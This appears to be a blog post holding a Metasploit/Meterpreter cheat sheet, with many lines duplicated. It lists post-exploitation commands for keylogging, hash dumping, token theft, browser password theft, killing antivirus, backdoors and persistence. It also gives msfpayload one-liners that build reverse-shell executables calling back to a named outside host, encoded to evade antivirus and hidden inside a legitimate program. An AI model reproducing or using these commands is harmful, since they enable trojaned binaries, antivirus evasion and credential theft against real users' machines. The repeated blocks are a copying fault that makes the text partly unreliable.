Meterpreter
Process:
getuid hows user id
getpid shows meterpreter process id
ps ists running processes
migrate [ps] migrates to given process (one that wont end/crash)
getpid shows meterpreter process id
ps ists running processes
migrate [ps] migrates to given process (one that wont end/crash)
idletime shows how long machine has been idle for
keyscan_start starts the key logger
keyscan_dump outputs captured data
keyscan_stop stops the keylogger
keyscan_start starts the key logger
keyscan_dump outputs captured data
keyscan_stop stops the keylogger
execute -f cmd.exe -c opens a new cmd.exe and creates a new channel for it
channel -l lists the open channels
read [channel] outputs data from channel
interact [channel] allows you to jump into the channel
write [channel] sends data to the channel
close [channel] kills the channel
channel -l lists the open channels
read [channel] outputs data from channel
interact [channel] allows you to jump into the channel
write [channel] sends data to the channel
close [channel] kills the channel
enumdesktops shows currently open desktops such as winlogin etc
getdesktop shows current desktop session meterpreter is in
setdesktop changes to an already open desktop session
uictl disable keyboard disables the keyboard of the desktop session
getdesktop shows current desktop session meterpreter is in
setdesktop changes to an already open desktop session
uictl disable keyboard disables the keyboard of the desktop session
timestomp file.txt -c "30/12/1980 12:12:34" changes file stamp of file
timestomp file.txt -f sourcefile.txt copys timestamp from sourcefile.txt
use priv to load the priv extras
hashdump to dump the SAM file :-)
timestomp file.txt -f sourcefile.txt copys timestamp from sourcefile.txt
use priv to load the priv extras
hashdump to dump the SAM file :-)
use incognito loads the incognito into meterpreter
list_tokens -u shows stealable tokens
impersonate_token allows a token to be stolen
steal_token [psid] allows ability to steal token of a process
rev2self reverts to origional token
run post/windows/gather/cachedump gets cached domain hashes
list_tokens -u shows stealable tokens
impersonate_token allows a token to be stolen
steal_token [psid] allows ability to steal token of a process
rev2self reverts to origional token
run post/windows/gather/cachedump gets cached domain hashes
Sniffer: Allows promiscuos mode to be enabled
use sniffer loads the sniffer functions
sniffer_interfaces list interface 1,2,3,4,5,6,etc
sniffer_start [n] starts the sniffer for the interface
sniffer_stats [n] lists packets, time, etc..
sniffer_dump [n] file.pcap dumps the capture locally
sniffer_stop you guessed it ;-)
sniffer_interfaces list interface 1,2,3,4,5,6,etc
sniffer_start [n] starts the sniffer for the interface
sniffer_stats [n] lists packets, time, etc..
sniffer_dump [n] file.pcap dumps the capture locally
sniffer_stop you guessed it ;-)
run checkvm checks if the target is a vm
run credscollect dumps hashes and tokens to screen
run enum_firefox dumps temp internet files from firefox – cookies, passwords, etc :-)
run get_application_list shows installed applications
run killav trys to stop all known AV progs
run get_local_subnets enumerates local subnet info
run metsvc creates a backdoor
run persistence survices a reboot (without admin or system)
run schedulme -e file.exe -m 30 you‘ll need to man load the meterpreter.exe payload
run kitrap0d allows priv escalation using CVE-2010-0232
run credscollect dumps hashes and tokens to screen
run enum_firefox dumps temp internet files from firefox – cookies, passwords, etc :-)
run get_application_list shows installed applications
run killav trys to stop all known AV progs
run get_local_subnets enumerates local subnet info
run metsvc creates a backdoor
run persistence survices a reboot (without admin or system)
run schedulme -e file.exe -m 30 you‘ll need to man load the meterpreter.exe payload
run kitrap0d allows priv escalation using CVE-2010-0232
web browser exploit
use auxilary/server/browser_autopwn
set LHOST [local_ip]
set SRVPORT 80
set URIPATH /
run
#now get the client to connect to you (use ettercap dns)
set LHOST [local_ip]
set SRVPORT 80
set URIPATH /
run
#now get the client to connect to you (use ettercap dns)
inbuilt sqlite db
db_driver sqlite3 starts the db using sqlite (file based)
db_connect job creates a new db called job and connects to it
db_hosts shows hosts
db_services shows visible services
db_nmap -sS [target_ip] performs nmap against target and stores in db
dn_import_nmap_xml allows inport
db_autopwn -p -e -r -t autoown from db vulns
db_connect job creates a new db called job and connects to it
db_hosts shows hosts
db_services shows visible services
db_nmap -sS [target_ip] performs nmap against target and stores in db
dn_import_nmap_xml allows inport
db_autopwn -p -e -r -t autoown from db vulns
Meterpreter Payload Backdoor
./msfpayload windows/meterpreter/reverse_tcp LHOST=phillipshome.getmyip.com LPORT=4444 X > clear.exe
./msfpayload windows/meterpreter/reverse_tcp LHOST=phillipshome.getmyip.com LPORT=4444 R | ./msfencode -e x86/shikata_ga_nai -c 5 -t exe -o encoded.exe
./msfpayload windows/meterpreter/reverse_tcp LHOST=phillipshome.getmyip.com LPORT=4444 R | ./msfencode -e x86/shikata_ga_nai -c 5 -t exe -o encoded.exe
sets the payload as meterpreter and then encodes it 5 times to bypass AV
./msfpayload windows/meterpreter/reverse_tcp LHOST=phillipshome.getmyip.com LPORT=4444 R | ./msfencode -t exe -x /mnt/hgfs/tools/exploits/spider.exe -k -o /share/spider.exe -e x86/shikata_ga_nai -c 5
#this fucker bypasses sophos
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.120 LPORT=4444 E
./msfpayload windows/meterpreter/reverse_tcp LHOST=phillipshome.getmyip.com LPORT=4444 R | ./msfencode -t exe -x /mnt/hgfs/tools/exploits/spider.exe -k -o /share/spider.exe -e x86/shikata_ga_nai -c 5
#this fucker bypasses sophos
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.120 LPORT=4444 E
One Liners
# One liner meterpreter reverse_tcp
/pentest/exploits/framework3/msfpayload windows/meterpreter/reverse_tcp LHOST=`ifconfig | grep ‘inet addr:’| grep -v ’127.0.0.1′ | cut -d: -f2 | awk ‘{ print $1}’` LPORT=4444 X > /root/clear.exe
# One liner shikata encoded meterpreter reverse_tcp
/pentest/exploits/framework3/msfpayload windows/meterpreter/reverse_tcp LHOST=`ifconfig | grep ‘inet addr:’| grep -v ’127.0.0.1′ | cut -d: -f2 | awk ‘{ print $1}’` LPORT=4444 R | /pentest/exploits/framework3/msfencode -e x86/shikata_ga_nai -c 5 -t exe -o /root/encoded.exe
# One liner encoded and hidden in windows exe meterpreter reverse_tcp
/pentest/exploits/framework3/msfpayload windows/meterpreter/reverse_tcp LHOST=`ifconfig | grep ‘inet addr:’| grep -v ’127.0.0.1′ | cut -d: -f2 | awk ‘{ print $1}’` LPORT=4444 R |/pentest/exploits/framework3/msfencode -t exe -x /mnt/hgfs/tools/exploits/spider.exe -k -o /root/spider.exe -e x86/shikata_ga_nai -c 5
0 komentar:
Posting Komentar